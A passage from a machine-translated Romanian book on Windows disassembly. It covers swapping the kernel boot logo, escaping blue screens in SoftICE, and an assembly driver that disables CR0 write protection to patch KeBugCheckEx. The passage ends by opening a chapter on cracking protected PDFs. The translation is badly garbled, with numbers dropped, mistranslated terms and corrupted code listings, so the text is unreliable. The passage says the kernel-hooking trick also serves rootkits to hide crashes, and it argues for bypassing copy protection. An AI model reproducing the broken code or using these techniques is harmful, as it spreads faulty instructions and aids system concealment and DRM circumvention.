fișier de disc (de exemplu, pentru a identifica faptul modificării sale în memorie), trebuie să știțiexact la ce să apelați, altfel puteți fi confuz Răspunsul este dat de comanda MOD Toate aceleași softice care aratănumele modulului nucleu - ntoskrnl și fișierul corespunzător - logoos exe (Fig ) Întregul accent este că numelemodulelor nu trebuie să corespundă numelor de fișiere Și acest lucru se aplică nu numai nucleului, ci și tuturorbibliotecilor dinamice în general!La prima încărcare a aspectului static sau a funcției ari-funcționare, sistemulgăsește un fișier pe disc în funcție de numele său, iar la încărcarea modulelor deja încărcate, căutarea merge înmemorie, unde există cineva care este specificat direct în export masa!Modificarea logo -ului de încărcare va modificaîn sfârșit logo -ul de încărcare care se afișează la fiecare încărcare Windows Dacă logo -ul nu este afișat, atuncifișierul boot ini are cheia /noguiboot, care, în special, este prescris cu forța de către debuggerul Softice atunci cândîl instalați Cert este că atunci când alegeți tipul de încărcare, debuggerul primește frâiele plăcii înainte de lansareadriverelor video, dar după ce sistemul transferă ecranul în modul VGA Softice cu acest mod este „nu prieteni” și deaceea introduce cheia /noguiboot, astfel încât sistemul să fie încărcat în modul text Cu încărcarea manuală adebuggerului de către comanda NTICE START NET, această cheie poate fi eliminată prin returnarea logo -ului de încărcarela locul său potrivit Imaginea standard care se afișează la începutul Windows pare destul de plictisitoare șiplictisitoare și ne provoacă să o înlocuim cu ceva mai interesant Logo -ul de încărcare este stocat în resurse însecțiunea Bitmaps Pentru a -l înlocui, veți avea nevoie de un editor de resurse de înaltă calitate care săreconstruiască corect secțiunea de resurse fără a aduce fișierul nucleu inutilizabil Cea mai bună alegere va fiutilitatea de hacker de resurse gratuite (Fig ), pe care o puteți descărca aici:http://www littlewhitegog com/downloadview- -resource hacker html Fig Resurse Hacker Utility pentru lucrulGPAV Metode moderne de patching Windows Logo Loading și Windows XP sunt prima imagine cu o rezoluție de x și adâncime de culoare Puteți crea un logo pe cont propriu folosind orice editor grafic adecvat (pentruExemplu, Adobe Photoshop) sau) Găsiți imaginea terminată pe internet (căutați doar cuvintele cheie „Colecția Logo Logo”sau „Galeria Logo Boot”) Colecții destul de bune de logo-uri pot fi găsite lahttp://www littlewhiteg com/content- html și http://ezskins ezthemes com/pkenhance/xb/ Pentru a înlocui logo -ul,rulați hackerul de resurse, deschideți o alternativă, selectați imaginea dorită în secțiunea Resurse și selectațicomanda Resursă Înlocuire din meniu Apoi specificați calea către fișier cu noua imagine și salvați fișierul ResourceHacker povestesc automat suma de control și După repornire, pe ecran va apărea un nou logo (Fig ) Orez Noul logo va apărea la repornirea notei existămulte utilități gratuite și plătite condiționat pentru a modifica logo -ul Windows Loading într -un mod mai sigur, fărăriscul de a deteriora nucleul Exemple sunt Bootskin (freeware) și bootxp (shareware), care pot fi descărcate de aici:http://www majorgeeks com/downloads html Prezentând în nucleu, invadăm sistemul de operare „sfânt” și, prin urmare,trebuie să ne pregătim în avans pentru posibile eșecuri Dacă discul este formatat pentru grăsime, atunci esteîntotdeauna posibil să încărcați de pe discheta sistemului și să restaurați toate fișierele din distribuțiaCD-R M Adevărat, dacă înainte de a fi instalate actualizările înainte, altarul se transformă în iad Chiar șireinstalarea totală nu ajută Windows refuză să fie instalate pe deasupra unei versiuni mai proaspete Din fericire, unpachet de actualizări este de obicei un fișier CAB obișnuit cu un EHE-instalator, iar fișierele necesare pot fieliminate fără instalare!Situația este mai complicată cu NTF -urile și, pentru a ajunge la secțiunile dorite, trebuie săconectați hard disk -ul cu un sistem căzut la un computer cu un sistem de lucru, instalându -l cu al doilea (cu toateacestea, BIOS -ul modern vă permite să încărcați de la orice hard disk) Ca opțiune, puteți utiliza produse precumWindows re-un tip de liveCD care se încarcă cu CD-R M și nu necesită instalare sau produs gratuit BART PE Builder (http://www nu /nu/pebuilder) Mai detaliat, aceste probleme sunt luate în considerare în următoarea carte: ChrisKaspersky, „Restaurarea datelor Leadership practic” -St Petersburg: BHV-Petersburg, Partea IV Metodeleavansate DizAssmit în mod natural, înainte de a face modificări la fișiere și/sau registru, este necesar să se creeze ocopie de rezervă Nota de la „Chirurgie” de notă duce adesea la erori de aplicații critice și la sistemul de operare însine în mod natural, ar fi logic să le ofere cititorilor informații detaliate despre depășirea consecințelor șirestaurării sistemului Cu toate acestea, întrucât cartea a crescut deja la dimensiuni de neconceput, nu este posibilăincluderea acestui material în versiunea sa tipărită Cu toate acestea, în secțiunea finală a acestui capitol, se voroferi recomandări interesante cu privire la depășirea ecranului albastru al morții, care apare adesea după hack -urinereușite ale nucleului Există viață după BSOD?Toată lumea știe ce este BSOD (care este „ecranul de moarte albastră” -ecranul albastru al morții) Aceasta este ultima suflare a sistemului de operare, după care aruncă groapa și merge larepornire, pierzând toate datele deghizate De altfel, o colecție excelentă de diverse BSOD care apar în diferitesituații este aici: http://www cognoodle cjb net/bsod/ Cu toate acestea, de fapt, BSOD nu este sfârșitul, iar dacărepornirea este înlocuită cu resuscitare, atunci în din cazuri puteți reveni la modul normal și aveți timp pentru afinaliza complet opera de operare înainte de a muri complet Ecranul albastru apare ori de câte ori miezul excităexcepția ireversibilă (să zicem, apelul de către pointerul zero) sau provoacă o operație evident incorectă (de exemplu,relareaza memoriei deja lansate) În toate aceste cazuri, controlul este transmis de funcția kebugcheckex, a căreidescriere poate fi găsită în DDK și care completează sistemul în modul de urgență, dacă este necesar, aruncând memoriade dump, săpând în care puteți determina cauza esecul Notă Informații mai detaliate despre această problemă suntprezentate în materiale suplimentare la acest capitol, care pot fi găsite pe CD-ul furnizat cu această carte îndirectorul \ Part \ ch \ Fuilition suplimentar al kebugcheckex acceptă patru argumente, Cea mai importantădintre care BugCheckCode este determinarea cauzei eșecului În total, există peste o sută de erori documentate înDDK (Căutați -le în Ghidul de debugger „Utilizarea Microsoft Debugger”), dar în realitate sunt multe altele Windows SP Nucleus Dysissement arată că kebugcheckex este numit de pe de locuri, în plus, în principal cu diverșiparametri Desigur, nu toate greșelile sunt aceleași în fatalitatea lor În sistemul de operare multi -core, aceasta nueste deloc o problemă Căderea unui nucleu nu îi afectează pe ceilalți Toate nucleele funcționează în spații de adreseseparate și sunt parțial sau complet izolate unele de altele Este foarte dificil să distrugi un astfel de sistem,arhitectura multi -core este extrem de rezistentă la eșecuri, dar în același timp foarte lent!Schimbul interiorselectează o mulțime de timp de procesor, iar dacă înghesuiți toate componentele într -un singur nucleu, nu vom primialtceva decât un nucleu monolitic în tipul Linux (care, apropo, a fost cauza criticilor aprige asupra acestuia din urmăde la mulți teoreticieni) În Linux, cu toate acestea, în BSD, toate componentele nucleului (se numesc module) sunt efectuate într -un singurspațiu vizat, iar un modul scris incorect poate abuza în mod neintenționat sau intenționat în proprietatea altcuiva(transformați datele în vinetă, de exemplu )Este un fapt!Cu toate acestea, în cazul unei excluderi ireversibile înnucleu (de exemplu, circulația cu un indicator zero), Linux „se prăbușește” doar modulul pe care această excepție l -agenerat fără să -i atingă pe toate celelalte Oprirea de urgență a sistemului apare numai din motive serioase, atuncicând ceva fundamental se prăbușește, ceea ce face ca munca suplimentară să fie cu adevărat imposibilă Desigur, dacășoferul CPAV -ului Hard „a zburat” Metode moderne de patching - acesta este deja sfârșitul Dar, deexemplu, puteți face fără un driver de plăci de sunet și faceți prin păstrarea tuturor datelor deghizate și abia apoirepornite Sistemele de operare a familiei Windows NT folosesc arhitectură hibridă, combinând punctele forte alemonoliticului și micro -tidalului (numit și „arhitectura micro -reinului modificat”), care teoretic ar trebui să asiguresuperioritatea față de Linux monolitic Apropo, nucleul experimental al GNU/HL'RT) este construit doar în arhitecturamicro -core Legendary stabilă Windows NT/XP, despre care se zice că este „aruncat” doar cu serverul, este de fapt foarteușor de condus în ecranul albastru Este suficient ca orice șofer să facă ceva nerezonabil, deoarece sistemul catapultăautomat utilizatorul, având grijă de el NOTĂ Pentru a minimiza consecințele prăbușirii sistemului, Windows NT acceptămecanisme de apel speciale pe care fiecare șofer le poate provoca funcția Keregisterbugcheckcallback și va înregistra ungestionar special care va primi managementul în momentul „ecranului albastru” Acest lucru permite, de exemplu, driverulsistemului de fișiere să -și reseteze tamponul, mai ales că își poate verifica integritatea în CRC sau există zvonuristabile că NTFS face acest lucru, așa cum ar fi fost, ca și în codul DizAssembled NTFS, nu există semne a unei provocăriKeregisterbugcheckcallback „la momentul accidentului tampon NTFS și supraviețuiește doar datorită sprijinuluitranzacțiilor în care atomicitatea tuturor operațiunilor este garantată (că operațiunea este fie efectuată saunu) Actualizarea înregistrării fișierelor nu poate apărea „jumătate” și, prin urmare, spre deosebire de grăsime,grupurile pierdute de pe acesta se formează semnificativ mai rar de funcționare a sistemului, aruncând ecranul albastru- cel mai elementar lucru care se poate face atunci când sistemul este prăbușit Microsoft a mers pe această cale,deoarece aceasta este calea celei mai mici rezistențe Vom arăta cum să ieșiți din ecranele albastre în modul normalpentru a avea timp pentru a salva toate datele înainte ca sistemul să se prăbușească complet Acesta este un truc destulde riscant În caz de eșec, putem pierde totul, chiar și volumul discului nostru, care va trebui să fie restaurat foartemult timp Cu toate acestea, pericolul nu este atât de mare În primul rând, vom demonstra tehnica de a depăși manualecranul albastru, apoi vom scrie un driver special care va face acest lucru automat Rețineți toate experimentele pe carele vom efectua pe Virgin Windows , fără pachetele de actualizare instalate (restul sistemelor se comportă la fel,doar adresele diferă, dar esența rămâne aceeași) pentru a minimiza riscul de deteriorare a sistemului principal , toateexperimentele descrise sunt recomandate să fie efectuate într -un emulator, de exemplu, de exemplu, în plus, veți aveanevoie de softice, Windows DDK, precum și de un set de Sovena Schreiber, care este furnizat cu cartea deja menționată "Windows ", aceste utilități pot fi descărcate, de exemplu, de aici http: // iradownloads/booksamples/schreiber zipsau de pe site -ul web al cărții http: //www rawo! Com/? TOOT = OVIVEN BSOD Folosind Softice a așteptat încărcareaWindows , rulăm driverul W K KILL Sys din setul de utilitate, shreiber Proiectat special pentru a apela ecranulalbastru, desigur, nu puteți rula doar șoferul din comandă Linie! Nu poți face fără un bootloader!În general, Windows NTacceptă încărcarea dinamică a driverelor, dar utilitatea terminată nu este inclusă în setul de aprovizionare standard-totul este în spiritul Microsoft, dar în Linux nu există probleme cu acest lucru Nota poate, desigur, să înregistrezeșoferul în registru, dar apoi sistemul va scădea la fiecare început, ceea ce nu este inclus în general în planurilenoastre, indiferent cât de insidios vor folosi bootloader -ul dinamic W K Load EH, care este inclus în Același set deDulls- W K LOAD EHE PARTEA IV Metode avansate de dizassembing e* Stop: x EC XG XBE DI , X , X DE EXCECTY NOT HANDLED ”* Adresa BE D Baza la BE D , Datestanp A CC - W K KAX Fig Ecranul albastru al morții care apare dupăîncărcarea driverelor ucigașe este colectat în linia de comandă w k load exe w k kill Sys și sistemul se încadrează înecranul albastru (Fig ) Acest lucru se întâmplă deoarece în procesul de inițializare a driverului ucigaș, codulprezentat în lista este executat Acest cod apelează la celula de memorie zero, care este strict interzisă Ntstatusdrivernry (pdriverjdbject pdriverrobject, punicode string pusregistryPath) return *((ntstatus *) );} A meritat sărenunți la sistem din cauza unui astfel de fleac?Cui este „criminalul” nostru interferează cu adevărat?!La urma urmei,integritatea sistemului nu a suferit deloc!Cum să explici acestui sistem de operare că totul este în regulă?Este timpulsă reveniți la modul utilizator și să continuați munca normală Dacă Softice a fost lansat în avans, atunci va prindeaceastă excepție și va arăta ecranul său, trecându -ne pe toți frații Reign (Fig ) Orez Softice poateprelucra multe excepții fatale și non -fizice care apar atât în ​​modul utilizator, cât și în nucleul GPAV Metodemoderne de patching dacă apăsați sau combinația + , apoi imediat după plecarea imediat după plecareaSoftice, va apărea ecranul albastru, iar atunci nu va fi nimic de reparat Dar, în timp ce suntem în softice, se poateface altceva Și puteți întreprinde următoarele: □ Determinați locul de eșec (în cazul nostru, acesta este apelul decătre indicatorul zero), corectați situația (stabiliți indicatorul corect) și lăsați manual procesorul de excepțiereturnând CS: EIP la stat original Această metodă este bună, dar din păcate, nu universală În plus, necesită o anumităinteligență pe care mașina nu o are □ Pentru a remedia fluxul curent, introducerea comenzii JMP $ în locul liber șiieșiți din debugger, permițând întreruperea comenzii g fl = i (dacă au fost brusc interzise) Sistemul de operare, deșiînfricoșător încet, va continua să funcționeze În acest caz, cel puțin, vom putea să -i finalizăm corect munca □Așteptați ca funcția Kebugcheckkex să apeleze și să iasă imediat din ea, ignorând eșecul și continuând implementareanormală Adevărat, în acest caz, nu avem garanții că sistemul nu se va prăbuși complet □ În sfârșit, ultima metodă estesălbatică, dar uneori funcționează: dați comenzile g eip = /r cs = lb, schimbând procesorul în modul de aplicație Cualte cuvinte, există multe opțiuni Să încercăm să folosim prima modalitate de a începe Știm că, în acest caz, accidentula avut loc din cauza unei erori de încălcare a accesului În consecință, procesorul a emoționat o excepție, a abandonatstiva EIP/CS/Flags în partea de sus și a predat controlului procesorului de excepție, în interiorul căruia suntemacum Nota uneori, dintr -un motiv de neînțeles, Softice nu se oprește la prima echipă a procesorului de excepție, cidirect pe locul eșecului în sine Sub VMware pentru prima dată, Softice se oprește întotdeauna în manipulator șitoate timpurile ulterioare - la locul eșecului, efectul persistă până la repornirea VMware Dăm comanda D ESP pentru aafișa conținutul stivei (lista ) Se recomandă o notă pentru comoditate pentru a comuta fereastra Dumpa pentru adubla cuvinte, folosind comanda DD G ♦ W G * 'LISTARE Срдаржимре :d esp :F C :F C :F CA ВЕ С AD D F D BE F D FFFFF А BE F D А Е • g Adresainstrucțiunii care a emoționat excepția se află în primul cuvânt dublu - BE C H (cu siguranță veți fi diferit pentrudvs ) Selectorul CS urmează Pentru noi toți, ar trebui să fie egal cu H Al treilea cuvânt dublu stochează conținutulregistrului de pavilion - eflags Acum știm locul eșecului (Fig ) și putem aduce scorul Dizassembler pe ecran Înacest sens, echipa U *ESP ne va ajuta (DizAssemble conținutul memoriei la adresa menționată de Registrul ESP) sau șiIVE S (Lista ) Vă rugăm să rețineți că în situații practice nu veți ști acest lucru PARTEA IV -ul IV -ul dedezasamblare avansată I LISTING Determinarea locului exact al eșecului : V S : V S : V S : V S : V S A : V C SV MOOP NOP NOP NOP EAX, [ ] figura Softice arată oinstrucțiune de excepție În circumstanțe obișnuite (fără softice), aici ar apărea un ecran albastru!Instrucțiunea care aprovocat un eșec!Și hai să -l „sărit” continuând să executăm cu Ret H?Făcut repede şi foarte bine Dar mai întâitrebuie să părăsiți procesorul de excepție Pentru a face acest lucru, în softice, trebuie să se efectueze următoarelecomenzi: n eir = *esp + sizeof (mov eax, [ ]);// Instalați registrul EIR pe ret P G CS = *(ESP + ),- // Instalațiselectorul CS și (nu neapărat) P g fl = i;// Permiteți întreruperile P G ESP = ESP + C // Scoateți cuvinte duble din stivă, // CPU abandonat acolo Oh // Lăsați debuggerul După efectuarea acesteisecvențe „magice” de comenzi, sistemul își va continua funcționarea normală, iar ecranul albastru nu vaapărea Fictiune!Incredibil!Tocmai am scăpat de moarte, care acum o clipă părea inevitabilă!GPAVA Metode moderne depatching O mică nuanță Nu toate versiunile Softice sunt capabile să restaureze Registrul ESP în procesorul deexcepție Debuggerul ignoră comanda G ESP = ESP +C, de fapt, imitând doar implementarea sa!Și acest lucru înseamnă căstiva rămâne dezechilibrată și, în ciuda tuturor eforturilor sistemului, prăbușirea sistemului se va întâmplatotuși Trebuie să victimă Vedem că un lanț lung de instrucțiuni NOP este situat în spatele RET H Dar dacă introducețicomanda Adăugare ESP aici, OCH, astfel încât procesorul în sine să echilibreze stiva?Spunem debuggerului un V S (asamblat începând cu adresa V S ) și introducem următoarele instrucțiuni de asamblare: Adăugați ESP, OC JMPBE C și faceți clic pe tasta Reinstalăm EIR la începutul „patch -ului” nostru - g eir = v s șilăsăm moale De data aceasta reușim!Doar în caz, secvența comenzilor pentru resuscitarea sistemului este dată în lista Este adevărat, trebuie amintit că se aplică numai în acest caz particular G eșec în câmp i u *eșp g eir = *eșp geir - eir + ar adaugă eșp, os jirp be c h;Adresa comenzii RET (în cazul dvs va fi diferită) Restaurarea automatăa metodei recent descrise de restaurare „manuală” este potrivită pentru programatorii de sistem care lucrează constantcu softice și pot înregistra registrele de scrimă ca un rapier Dar utilizatorii obișnuiți sunt similari cu o astfel deabordare a morții Dar de ce nu scriem o utilitate care este blocată de un flexor sau de o precizie de închidere akebugcheckex?Notă pentru a scrie o astfel de utilitate nu este dificil (și o scriem cu adevărat), cu toate acestea,trebuie amintit că aceasta este cam la fel ca punerea jurnalului sub supapa de urgență dacă sistemul este descărcat,atunci în acest caz nu va fi nu va fi mai mult timp Cu toate acestea, merită să riscați, mai ales în cazurile în caresunteți sigur că acest lucru se poate face următorul experiment Faceți clic pe combinația de tastatură + Pentrua apela Softice, instalați punctul de oprire pe kebugcheckkex și porniți driverul nostru Mai mult, punctul de opriretrebuie să fie hardware (BPM kebugcheckex x), nu software (BPX KebugCheckex), altfel nimic nu va funcționa De aceastădată, în loc să raporteze o eroare de acces la pagină, Softice apare în funcționarea punctului de oprire, subliniindprima echipă a funcției KebugCheckkex (Fig ), care în cazul nostru este localizată la BF H Prin defilareaferestrei DizAssembler în jos, găsim prima instrucțiune RET H (în cazul nostru, aceasta este situată la Cle h) Aceasta este o echipă de ieșire din funcția la care trebuie să fie făcută JMP Pentru o căutare rapidă înSoftice, puteți da comanda de căutare (S EIR - с ) Dăm debugger -ului echipei G eir = S E (adresa dvs este cel mai probabil să fie diferită) și lăsați presa + Debuggerul apare din nou, în aceeași funcție Nu amreușit?!Ia -ți timp cu concluzii!Totul merge conform planului!Ignorarea criticii Partea a IV -a Metodele avansate deerori de dizassmitting provoacă o cascadă întreagă de excepții secundare, care în acest caz apare Repetăm ​​echipanoastră G eir = S E (pentru aceasta este suficient pentru a apăsa + ), iar sistemul este returnat în modulnormal!Pentru a treia oară, debuggerul nu mai apare Mouse -ul încetinește puțin, dar este destul de posibil să -lconduci pe covor Orez Interceptarea BSOD folosind echipa Softice BPM KebugcheCheckex X începe să creeze un drivercare să facă toate acestea pentru noi Pentru început, avem nevoie de un schelet Arată așa cum se arată în lista B Scheletul „pseudorever”, care nu controlează niciun dispozitiv, ci cotul; Model Flat, stdcall;Folosițicomenzi cp ;Model de memorie plată, apeluri STDCall cod;Secțiunea de cod DriveRentry Proc;Punctul de intrare cătreșofer ;Codul șoferului MOV EAX, C H RET DRIVENTRY ENDP;Returnează eroarea deconfigurare;Status device configuration error ;Plecăm End Driver Gpava Metodele moderne de patching nu sunt defapt un șofer El nu acceptă niciun pachet IRP, nu deservește niciun dispozitiv și nu face nimic deloc, doar încărcări șidescărcări Dar pentru aventura noastră, acest lucru va fi suficient!Întregul cod este concentrat în procedura dnvertry - Un fel de analog al funcției principalului limbii C, care se realizează atunci când încearcă să încarce șoferul,inițializând tot ceea ce este necesar De aici puteți „ajunge” la funcția kebugcheckex și o puteți modifica la discrețiadvs În ciuda faptului că procedura Dnverentry este efectuată la nivelul nucleului cu privilegii maxime, o încercare de„editare” codul mașinii duce la încălcări de acces Acest lucru este declanșat de protecția împotriva unui nucleu de hackneintenționat cu un driver incorect (vezi Sepa, acest capitol „Modificarea nucleului în memorie” și listarea ) Cumse deconectează?Așa cum am menționat deja, există două modalități de a opri această protecție (prin registru și prinreinstalarea pavilionului WP în registrul CR ) Ambele metode au fost deja discutate mai devreme în acest capitol Existăun alt mod - reapariția (reapariția) paginilor Afișăm adresa fizică a paginii în care KebugCheckex se bazează pe spațiulvirtual vizat al procesului nostru, apelând la funcția NTMAPViewofSction, atribuind toate motivele pentru care serealizează motivele nucleului, dar chiar și pagina afișată poate fi abordată Chiar și de la nivelul aplicației Beauty Conform acestei scheme, multe firewall -uri și alte programe care au nevoie de funcții nucleare, de exemplu, Rutkita,informații mai detaliate despre această problemă pot fi găsite la http://www stanford edu/~stinson/miss/curr res/hooks/nt hooking txt și http://acsac org/ / papersz pdf În plus, puteți găsi multe reutilizări interesante pe internetcompletând cuvintele cheie ale Windows NT System-Call Hooking WP în registrul CRO Deși acesta este Un truc suficientde „murdar” cu multe „contraindicații”, este destul de potrivit pentru acest caz, în special luând în considerare faptulcă conține doar comenzi de mașină (listarea ) Listarea Cod Code , Otgtss^ Ishichizash $ $ T omotificareîn memoria MOV EAX, SGO; încărcăm registrul de gestionare în registrul EAH Și EAH, OFFFFFFH; resetați WP, interzicândînregistrarea Mov sgo;Mănânc managerul registrului În consecință, pentru a activa protecția, trebuie să se stabileascăbitul WP, ceea ce se fac următoarele comenzi ale mașinii (lista ) Listarea cod, Vosogai^ odiivafschm,nucleele din modificarea în memoria MOV eah, sgo;Încărcăm managerul registrului în registrul EAC Sau eah, looooh,-aruncăm un bit WP care interzice înregistrarea Mov, eax;Actualizăm registrul de gestionare al SGO Programul „corect dinpunct de vedere politic” nu numai că ar trebui să oprească/să oprească protecția împotriva înregistrării, dar amintiți-vă de starea actuală a bitului WP înainte de a se schimba, apoi pentru a -l restabili în starea inițială, altfel putețiactiva involuntar protecția la Cea mai mare moment inoportun, chiar înainte de modificarea planificată, acesta va fifinalizat Puteți „scrupui” funcția kebugcheckex în moduri diferite Cea mai corectă (și mai fiabilă!) Este să -șidetermine adresa analizând tabelul de import Cu toate acestea, această abordare este prea obositoare și laborioasă Estemult mai ușor să înlocuiți adresele pregătite gata, lovindu -le în programul dvs Dezavantajul acestei soluții este căutilitatea nu va funcționa pe alte computere Merită să instalați (sau să ștergeți) un serviciu sau să treceți la o altăversiune a sistemului, deoarece toate adresele se vor schimba imediat Cu toate acestea, având textele inițiale aleșoferului la îndemână, acesta poate fi întotdeauna corectat și compros -compil Deci, pentru „utilizare la domiciliu”,această soluție este destul de acceptabilă Partea IV Metodele avansate DizAssmit sunt subtilitatea principală înfaptul că nu ar trebui să atingem primul octet al funcției kebugchekex, deoarece a „atins” softice Sunt acționate șialte programe de hacker (de exemplu, ARI-SHPIONS), plasând comanda în OZ (OPCOD CCH) aici, după păstrarea conținutuluianterior undeva la o adresă diferită OK, vom omite prima echipă (în cazul nostru, acesta este Push Jar) și vom începeimplementarea cu a doua Pentru a echilibra stiva, în contrast cu împingerea, spunem Ror EAH, și apoi introduceți JMP peRET H, fie comanda Ret H direct Ultima opțiune este mai scurtă și mai elegantă Se realizează așa cum se arată înlista Listarea J Codul care este „Shackle” funcție kebugcheckex mov dword ptr ds: [ bf h+l], c haici: bf h - începutul funcțiilor kebugcheckex (toate mașinile sunt diferite), este lungimea instrucțiunilorapăsând, și S N - Codul mașinii, codul mașinii, codul mașinii, codul mașinii, codul mașinii, codul mașinii, codulmașinii, codul mașinii, codul mașinii, codul mașinii, codul mașinii, codul mașinii Reprezentarea secvenței a douăechipe: Pop EAX ( H )/Ret H (C H H H) Combinând toate componentele, obținem codul prezentat în lista :LISTARE EAX, CRO, CRO Eax OffFFFFFH; Georgian Manager Registrul CRO la Registrul EAC ;Păstrăm bitul WP în registrul EBX ;Renunțăm la o mușcătură WP care interziceînregistrarea ;Actualizăm registrul de gestionare al SGO MOV DWORD PTR DS: [ BF H+L], C H C ;„Burning”kebugcheckex MOV CRO, EBX MOV EAX, C O H RET DRIVENTRY ENDP ENDP Driverentry;Restaurați bitulWP ;Status device configuration error Iată un șofer atât de mic și cât de multe date poate salva!Rămâne doar pentru a -lcompila, așa cum se arată în lista și puteți trece la teste 'Listarea Asamblarea și aspectul driverului„anti-BSOD” (folosind: MASM, care face parte din Windows NT DDK) ML /Nologo /Coff Nobsod asm Link /Driver: xL /Aliniați: /out:Nobsod sys /Subsystem: Native NobSod Obj Dacă totul s -a făcut corect, atunci fișierul NobSod Sys seformează pe disc, pe care îl vom descărca folosind bootloader dinamic W K LOAD ar trebui să fie așa Totul ar trebui săfie Totul ar trebui să fie În mod normal! Am returnat codul Status Device CONF GURARE EROR! Notă pentru VMware Acesttruc nu funcționează, deoarece VMware nu emulează pe deplin registrul și astfel de glume pur și simplu nu înțelege,provocând sistemul de operare pentru oaspeți în oaspete în În acest caz, în acest caz, în acest caz, puteți face toateliniile legate de registrul său și puteți opri protecția protecției și deconectați protecția prin registru, CAPA Patch -uri moderne de patching oferind cheia corespunzătoare „ Registr Editor ”, apropo, dacă softice este instalatpe mașina țintă, atunci o astfel de cheie a fost deja creată și nu este nevoie de nimic pentru a face nimicVoi încărcașoferul ucigaș pentru a verifica dacă remediul nostru împotriva BSOD va face față sau nu Dacă softice este instalat însistem, atunci va apărea de mai multe ori Ieșiți din debugger apăsând sau + Dar, într -un fel sau altul,ecranul albastru nu mai apare!Sistemul inhibă teribil, dar funcționează în continuare Și acesta este principalulpunct!Lucrul rău este că acum Windows nu poate semnala că a avut loc o defecțiune a sistemului și că sistemul ar trebuisă fie închis cât mai curând posibil, făcând oprirea Cum să remediați acest dezavantaj?Cel mai simplu lucru este săadăugați mai multe linii de asamblare la „patch -ul nostru” pe kebugcheckkex, care va oferi un semnal sonor sau chiar vajuca o melodie pe dinamică În principiu, puteți chiar împărți codurile de bugCheck în categorii, fiecare dintre acesteava corespunde numărului său de bipuri Nu este nevoie să mergeți departe pentru exemple Acestea pot fi împrumutate de laorice virus DOS Tehnica dinamicii sistemului de programare la nivelul nucleului a rămas, de asemenea, neschimbată Decitotul depinde de imaginația ta Cât de sigură este utilitatea anti-BSOD?Kebugcheckex ajută întotdeauna?Cât de sigureste?Este foarte, foarte periculos și nu ajută întotdeauna Aici, de exemplu, luăm în considerare următorul exemplu decod împrumutat din nucleu (listarea ) ^Shunting ** kebugcheckex se încheie> foarte sad „>>>” • '• Callexal ocatepolwitag;Izolarea memoriei Poole CITț> EAX, EBX;Verificări de succes ;Izolareamemoriei MOV DS: DWORD BA , EAX D JNZ scurt LOC C;-> Ni s -a oferit o memorie de F PushEBX;\ PUSH EBX;+ PUSH ;+- și aici nu ne-au dat memorie! PUSH ;+- Mergem la cer PUSH H;+ Apelați kebugcheckex;/ C LOC C;Cod xref: sub cl+ cîj c LEA EAX,[EBP+VAR C];Continuăm implementarea normală F PUSH EBX PUSH EAX Sistemul alocă memorie dintr -un poolcomun, iar dacă totul este în ordine cu memorie, apare o continuare normală, altfel ecranul albastru se desprinde Săpresupunem că am „scurtat” kebugcheckkex, atunci ce?Nu ni s -a oferit memorie și continuăm implementarea normală, ca șicum nu s -ar fi întâmplat nimic, întorcându -se conform indicatorului, care nu indică nicăieri Apare o cascadă întreagăde excepții secundare, toate structurile de date se transformă în praf, iar sistemul este complet prăbușit Concluzia amsupraviețuit și am câștigat BSOD - cea mai groaznică catastrofă, după care suntem cu toții pe umăr!Desigur, estenerezonabil să practici o astfel de abordare pe server, dar pentru stațiile de lucru este destul de acceptabil Apropo,unele viruși, viermi și rute folosesc echipamente similare pentru a -și masca prezența în sistem Un virus scris incorectpoate provoca un ecran albastru, iar în jurnalul de sistem va apărea o intrare adecvată care ajută administratorul să seocupe de problemă Dacă „schimbați” kebugcheckex, atunci computerul va încetini sau agățați, dar nu va apărea nimic înrevistă!Capitolul Demontarea fișierelor altora Formatele din capitolele anterioare ale acestei părți au luat în considerare problemele dizassambling-ului de fișiere de și de biți de fișiere ELF, precum și nuclee Linux și Windows, inclusiv unele metode avansate pentru modificarealor pe disc și în memorie În acest capitol, finalizarea părții a IV -a, vom lua în considerare dizassemble -ulfișierelor altor formate folosind formatul PDF ca exemplu Demontarea fișierelor PDF Protecția proprietății intelectualea luat recent din ce în ce mai multe forme mai nefirești și urâte, care sunt contrare intereselorconsumatorilor Deținătorii de drepturi de autor limitează capacitățile noastre, interzicând vizualizarea, copierea,tipărirea, editarea informațiilor, dar hackerii nu se așează, construiesc baricade și alte mijloace de luptă Iată timpulpentru a face o mică digresiune și a observa că hackerii normali nu sunt deloc anarhiști deloc și departe defreebies Sunt gata să plătească și să mențină o rubină de dezvoltatori de software cu adevărat bun, autori preferați șiinterpreți!Adevărat, există unul „dar” Dorința de a face parte cu banii se evaporă imediat dacă titularul dreptului deautor începe să împacheteze consumatorul legal care a cumpărat sincer produsul, de exemplu, interzicând documentul săimprime sau să copieze textul cărții electronice în tamponul de schimb Ei bine, de ce faci asta?Orice pirat va ocoli încontinuare o astfel de protecție, iar utilizatorii cinstiți sunt doar probleme și inconveniente Dar într -un moment încare principalii transportatori ai informațiilor erau cărți de hârtie și bobine cu bandă, nu s -a întâmplat niciodatănimănui să lupte cu consumatorii!Dimpotrivă, toată lumea a căutat să ofere cât mai multe servicii, iar media digitală afost una dintre ele Cărți electronice, muzică și filme în format MP /MP au explodat literalmente lumea veche, iarsistemul „vânzător-cumpărător”, inclusiv În loc să mergem la magazin, acum căutăm informațiile necesare pe internet saucopiem fișiere de la prieteni Nu mai este posibil să tranzacționați în aceste condiții în aceste condiții și nu dorescsă stăpânească noile tehnologii ale porților pieței Profitul magnaliștilor mass -media scade rapid și, pentru a lemenține, încep să acționeze în detrimentul în loc să se îndrepte către utilizatori, inventând din ce în ce mai multăprotecție care limitează capacitățile, facilitățile și drepturile noastre Instrumentele tehnice vă permit să procesațiinformațiile rapid și eficient, numai lăcomia deținătorilor de drepturi de autor nu permite acest lucru Și hackerii -pentru acces gratuit la informații și, prin urmare, vor folosi toată puterea progresului tehnologic pentru a lucra cudocumentele așa cum le place și cât de convenabil este!La urma urmei, cunoștințele ne eliberează cu adevărat de lanțuriși cătușe!În acest capitol, vom lua în considerare hacking -ul fișierelor PDF sigure utilizate pentru stocarea șitransmiterea diferitelor texte și angajați ca bază pentru cărți electronice Studierea structurii acestor fișiere vaarăta clar ce mecanisme sunt utilizate pentru a proteja GPAV Demontarea fișierelor din alte formate Fișiere ale acestui format și cum pot fi evitate să fie evitate folosind atât mijloaceledisponibile, cât și potențialul dvs intelectual Atenție, activitatea de acest fel este riscantă și periculoasă!Baniicare „se învârt” în această afacere sunt suficienți pentru a încuraja deținătorii de drepturi de autor să vă usuce dacăîncepeți să utilizați informațiile date aici altfel decât în ​​scopuri educaționale Este suficient să reamintim cazularestării fără precedent a lui Dmitry 